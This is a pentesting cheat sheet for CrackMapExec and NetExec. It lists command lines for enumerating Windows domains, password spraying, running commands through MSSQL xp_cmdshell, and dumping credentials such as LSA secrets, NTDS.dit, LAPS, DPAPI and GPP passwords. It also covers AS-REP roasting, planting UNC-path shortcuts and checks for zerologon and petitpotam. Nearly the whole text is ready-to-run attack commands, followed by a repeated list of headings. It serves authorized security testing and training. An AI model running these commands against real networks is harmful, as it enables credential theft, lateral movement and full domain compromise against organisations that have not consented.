A cheat sheet for CrackMapExec and NetExec, featuring useful commands and modules for different services to use during Pentesting

CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec (no longer maintained)

NetExec: https://github.com/Pennyw0rth/NetExec

Installation: https://www.netexec.wiki/getting-started/installation

The same commands for crackmapexec would also work for NetExec

Other names: cme, nxc

Enumeration

Initial Enumeration

1	crackmapexec smb target

Null Authentication

1	crackmapexec smb target -u '' -p ''

Guest Authentication

1	crackmapexec smb target -u 'guest' -p ''

List Shares

1	crackmapexec smb target -u '' -p '' --shares

1	crackmapexec smb target -u username -p password --shares

List Usernames

1	crackmapexec smb target -u '' -p '' --users

1	crackmapexec smb target -u '' -p '' --rid-brute

1	crackmapexec smb target -u username -p password --users

Local Authentication

1	crackmapexec smb target -u username -p password --local-auth

Using Kerberos

1	crackmapexec smb target -u username -p password -k

Check for hosts that have SMB signing disabled

1	crackmapexec smb target(s) --gen-relay-list relay.txt

Spraying

Password Spray

1	crackmapexec smb target -u users.txt -p password --continue-on-success

1	crackmapexec smb target -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-success

1	crackmapexec ssh target(s) -u username -p password --continue-on-success

SMB

All In One

1	crackmapexec smb target -u username -p password --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol

Spider_plus Module

1	crackmapexec smb target -u username -p password -M spider_plus

1	crackmapexec smb target -u username -p password -M spider_plus -o READ_ONLY=false

Dump a specific file

1	crackmapexec smb target -u username -p password -k --get-file target_file output_file --share sharename

LDAP

Enumerate users using ldap

1	crackmapexec ldap target -u '' -p '' --users

All In One

1	crackmapexec ldap target -u username -p password --trusted-for-delegation --password-not-required --admin-count --users --groups

MSSQL

Authentication

1	crackmapexec mssql target -u username -p password

Execute commands using `xp_cmdshell`

-X for powershell and -x for cmd

1	crackmapexec mssql target -u username -p password -x command_to_execute

Get a file

1	crackmapexec mssql target -u username -p password --get-file output_file target_file

Secrets Dump

Dump LSA secrets

1	crackmapexec smb target -u username -p password --local-auth --lsa

gMSA

1	crackmapexec ldap target -u username -p password --gmsa-convert-id id

1	crackmapexec ldap domain -u username -p password --gmsa-decrypt-lsa gmsa_account

Group Policy Preferences

1	crackmapexec smb target -u username -p password -M gpp_password

Dump LAPS password

1	crackmapexec smb target -u username -p password --laps

Dump dpapi credentials

1	crackmapexec smb target -u username -p password --laps --dpapi

Dump NTDS.dit

1	crackmapexec smb target -u username -p password --ntds

Asreproast

1	crackmapexec ldap target -u username -p password --asreproast asrep.txt

Bloodhound

1	crackmapexec ldap target -u username -p password --bloodhound -ns ip --collection All

Useful Modules

Webdav

Checks whether the WebClient service is running on the target

1	crackmapexec smb ip -u username -p password -M webdav

Veeam

Extracts credentials from local Veeam SQL Database

1	crackmapexec smb target -u username -p password -M veeam

slinky

Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions

1	crackmapexec smb ip -u username -p password -M slinky

ntdsutil

Dump NTDS with ntdsutil

1	crackmapexec smb ip -u username -p password -M ntdsutil

ldap-checker

Checks whether LDAP signing and binding are required and/or enforced

1	cme ldap target -u username -p password -M ldap-checker

Check if the DC is vulnerable to zerologon, petitpotam, nopac

1	crackmapexec smb target -u username -p password -M zerologon

1	crackmapexec smb target -u username -p password -M petitpotam

1	crackmapexec smb target -u username -p password -M nopac

Check the MachineAccountQuota

1	crackmapexec ldap target -u username -p password -M maq

ADCS Enumeration

1	crackmapexec ldap target -u username -p password -M adcs

Enumeration

Initial Enumeration

Null Authentication

Guest Authentication

List Shares

List Usernames

Local Authentication

Using Kerberos

Check for hosts that have SMB signing disabled

Spraying

Password Spray

SMB

All In One

Spider_plus Module

Dump a specific file

LDAP

Enumerate users using ldap

All In One

MSSQL

Authentication

Execute commands using xp_cmdshell

Get a file

Secrets Dump

Dump LSA secrets

gMSA

Group Policy Preferences

Dump LAPS password

Dump dpapi credentials

Dump NTDS.dit

Asreproast

Bloodhound

Useful Modules

Webdav

Veeam

slinky

ntdsutil

ldap-checker

Check if the DC is vulnerable to zerologon, petitpotam, nopac

Check the MachineAccountQuota

ADCS Enumeration

Execute commands using `xp_cmdshell`